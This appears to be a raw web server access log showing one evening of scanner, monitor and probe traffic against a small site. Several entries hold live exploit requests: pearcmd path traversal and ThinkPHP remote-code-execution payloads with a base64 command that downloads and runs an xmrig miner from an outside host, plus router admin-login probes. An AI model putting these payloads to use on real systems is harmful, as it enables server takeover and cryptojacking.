61.219.11.155 - - [04/Oct/2023:22:14:29 +0200] "\xe7qK" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:14:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:15:21 +0200] "GET /NPClient.html HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:15:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:22:16:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:17:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.169.55 - - [04/Oct/2023:22:17:39 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:17:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:18:10 +0200] "GET /apps HTTP/1.1" 404 309 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.10.169.55 - - [04/Oct/2023:22:18:12 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:18:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:22:19:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:19:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:20:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:21:00 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:21:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:22:22:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:22:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:23:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:24:07 +0200] "GET /index.asp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:24:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:22:25:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:25:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:26:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:26:52 +0200] "GET /video.html HTTP/1.1" 404 315 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:27:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:28:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:28:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.95.147.236 - - [04/Oct/2023:22:29:10 +0200] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/ohhellohttpserver.php HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [04/Oct/2023:22:29:10 +0200] "GET /index.php?lang=../../../../../../../../tmp/ohhellohttpserver HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [04/Oct/2023:22:29:10 +0200] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==|base64${IFS}-d|sh HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [04/Oct/2023:22:29:11 +0200] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='shell_exec(base64_decode(\"bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==\"));' HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [04/Oct/2023:22:29:11 +0200] "GET /public/index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='shell_exec(base64_decode(\"bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==\"));' HTTP/1.1" 404 321 "-" "Custom-HttpClient"
18.169.184.14 - - [04/Oct/2023:22:29:33 +0200] "GET /2.0/gui/ HTTP/1.1" 404 313 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:29:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:22:30:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:31:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:31:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:32:14 +0200] "GET /mm/ HTTP/1.1" 404 308 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:32:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.232.155.76 - - [04/Oct/2023:22:32:48 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:22:33:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:33:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.232.155.113 - - [04/Oct/2023:22:34:34 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:22:34:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:34:57 +0200] "GET /ui HTTP/1.1" 404 307 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:35:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:22:36:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:36:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:22:37:08 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:37:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:22:37:47 +0200] "" 501 315 "-" "-"
18.169.184.14 - - [04/Oct/2023:22:37:49 +0200] "GET /portal HTTP/1.1" 404 311 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
185.170.144.3 - - [04/Oct/2023:22:38:00 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:38:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:39:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:39:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:40:32 +0200] "GET /node HTTP/1.1" 404 309 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:40:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:22:41:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:41:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:42:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:42:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:22:42:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:43:16 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
35.177.147.70 - - [04/Oct/2023:22:43:21 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.169.184.14 - - [04/Oct/2023:22:43:24 +0200] "GET /login.cs HTTP/1.1" 404 313 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
123.58.207.127 - - [04/Oct/2023:22:43:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:43:34 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:43:43 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:43:43 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
212.91.246.72 - - [04/Oct/2023:22:43:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.58.207.127 - - [04/Oct/2023:22:43:44 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:43:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:44:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:44:00 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:44:00 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
205.210.31.224 - - [04/Oct/2023:22:44:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.224 - - [04/Oct/2023:22:44:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:44:41 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
35.177.147.70 - - [04/Oct/2023:22:44:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:44:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.58.207.127 - - [04/Oct/2023:22:44:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.169.184.14 - - [04/Oct/2023:22:45:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:45:06 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:45:06 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:45:06 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
35.177.147.70 - - [04/Oct/2023:22:45:08 +0200] "GET /api/v1/charts HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
123.58.207.127 - - [04/Oct/2023:22:45:28 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:45:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:45:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.52 - - [04/Oct/2023:22:45:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.52 - - [04/Oct/2023:22:45:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.52 - - [04/Oct/2023:22:45:47 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.52 - - [04/Oct/2023:22:45:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
123.58.207.127 - - [04/Oct/2023:22:45:50 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:45:54 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:45:54 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:45:54 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:46:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.169.184.14 - - [04/Oct/2023:22:46:05 +0200] "GET /login HTTP/1.1" 404 310 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
123.58.207.127 - - [04/Oct/2023:22:46:15 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:46:15 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:46:15 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
159.203.162.110 - - [04/Oct/2023:22:46:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
123.58.207.127 - - [04/Oct/2023:22:46:37 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:46:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.58.207.127 - - [04/Oct/2023:22:46:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:46:50 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:47:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:47:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:47:03 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:47:03 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:47:03 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:47:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:47:15 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:47:15 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:47:15 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
35.177.147.70 - - [04/Oct/2023:22:47:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:47:29 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:47:29 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:47:29 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
18.169.184.14 - - [04/Oct/2023:22:47:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:22:47:40 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:47:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.50 - - [04/Oct/2023:22:48:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
172.105.77.209 - - [04/Oct/2023:22:48:36 +0200] "GET /0bef HTTP/1.0" 404 305 "-" "-"
18.169.184.14 - - [04/Oct/2023:22:48:41 +0200] "GET /WebViewer.html HTTP/1.1" 404 319 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:48:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.58.207.127 - - [04/Oct/2023:22:48:44 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
172.105.77.209 - - [04/Oct/2023:22:48:50 +0200] "GET /0bef HTTP/1.0" 404 305 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:48:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
159.203.162.110 - - [04/Oct/2023:22:49:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
159.203.162.110 - - [04/Oct/2023:22:49:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.86/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
123.58.207.127 - - [04/Oct/2023:22:49:10 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:49:10 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:49:10 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:49:13 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
172.105.77.209 - - [04/Oct/2023:22:49:14 +0200] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.77.209 - - [04/Oct/2023:22:49:20 +0200] "GET /0bef HTTP/1.0" 404 305 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:49:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
123.58.207.127 - - [04/Oct/2023:22:49:38 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:49:38 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.58.207.127 - - [04/Oct/2023:22:49:38 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
35.177.147.70 - - [04/Oct/2023:22:49:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:49:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:22:50:09 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
172.105.77.209 - - [04/Oct/2023:22:50:09 +0200] "GET /0bef HTTP/1.0" 404 305 "-" "-"
18.169.184.14 - - [04/Oct/2023:22:50:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
172.105.77.209 - - [04/Oct/2023:22:50:29 +0200] "GET /0bef HTTP/1.0" 404 305 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:50:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:51:34 +0200] "GET /vpn/index.html HTTP/1.1" 404 319 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:51:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [04/Oct/2023:22:51:44 +0200] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.77.209 - - [04/Oct/2023:22:51:49 +0200] "GET /0bef HTTP/1.0" 404 305 "-" "-"
35.177.147.70 - - [04/Oct/2023:22:52:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
172.105.77.209 - - [04/Oct/2023:22:52:27 +0200] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.77.209 - - [04/Oct/2023:22:52:32 +0200] "GET /0bef HTTP/1.0" 404 305 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:22:52:44 +0200] "GET /doc/page/login.asp HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.169.184.14 - - [04/Oct/2023:22:53:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
